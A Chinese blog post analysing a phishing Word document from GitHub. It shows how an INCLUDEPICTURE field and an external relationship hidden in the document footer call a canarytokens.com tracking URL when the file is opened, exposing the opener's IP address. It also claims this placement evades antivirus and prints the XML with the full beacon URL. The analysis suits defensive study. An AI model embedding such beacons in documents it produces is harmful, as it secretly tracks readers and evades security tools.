写在前面
Hvv期间有很多红蓝互钓的钓鱼文件,这里对github上Fofahubkey这个word文件做简单的分析。因为已经出来一段时间,有很多大佬展开过分析,这里是站在大佬们的上帝视角分析。
Github上的Fufahub钓鱼项目
采用技术:在Office Word文档的页脚中插入OLE2Link对象以躲避杀软的检测,由于常见的基于OLE2Link的漏洞利用(比如CVE-2017-0199)都是在worddocument.xml中插入远程的OLE对象,所以这导致大部分杀软并未检测到document.xml以外的组件中包含的威胁。
样本在页脚中插入OLE2Link对象的分析如下:
1.页脚文件wordfooter2.xml中包含了一个Link对象,设置id:
2.word_relsfooter2.xml.rels中设置具体链接的具体内容
此文件免杀效果:
|
引擎 |
检出 |
引擎 |
检出 |
|
微软(MSE) |
无检出 |
ESET |
无检出 |
|
卡巴斯基(Kaspersky) |
无检出 |
小红伞(Avira) |
无检出 |
|
IKARUS |
无检出 |
大蜘蛛(Dr.Web) |
无检出 |
|
Avast |
无检出 |
AVG |
无检出 |
|
GDATA |
无检出 |
K7 |
无检出 |
|
安天(Antiy) |
无检出 |
江民(JiangMin) |
无检出 |
|
360(Qihoo 360) |
无检出 |
Baidu |
无检出 |
|
NANO |
无检出 |
Trustlook |
无检出 |
|
瑞星(Rising) |
无检出 |
熊猫(Panda) |
无检出 |
|
Sophos |
无检出 |
ClamAV |
无检出 |
|
WebShell专杀 |
无检出 |
Baidu-China |
无检出 |
搜索到了新知识,docx文档可以解压
翻文档发现/word/footer2.xml主动访问恶意链接http://canarytokens.com/terms/articles/xxxx/post.jsp
-<w:ftr mc:Ignorable="w14 w15 wp14" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas">-<w:r><w:instrText xml:space="preserve"> INCLUDEPICTURE "http://canarytokens.com/terms/articles/ayz4tfaqbetnwn1pz1gmqspi3/post.jsp" d * MERGEFORMAT </w:instrText>+<v:shapetype id="_x0000_t75" stroked="f" filled="f" path="m@4@5l@4@11@9@11@9@5xe" o:preferrelative="t" o:spt="75" coordsize="21600,21600">
同时在/word/_rels/footer2.xml.rels 发现恶意访问http://canarytokens.com/terms/articles/xxxx/post.jsp
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="http://canarytokens.com/terms/articles/ayz4tfaqbetnwn1pz1gmqspi3/post.jsp" TargetMode="External"/></Relationships>
canarytokens.com做信标,作用与dnslog相同,相当于一个长久有效的dnslog。可以获取点击者的出口ip,也就是用于获取红队/蓝队的出口ip。
写在最后
本人坚决反对利用文章内容进行恶意攻击行为,一切错误行为必将受到惩罚,绿色网络需要靠我们共同维护,推荐大家在了解技术原理的前提下,更好的维护个人信息安全、企业安全、国家安全。
原文始发于微信公众号(云下信安):对Fofahubkey钓鱼文件的简单分析
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论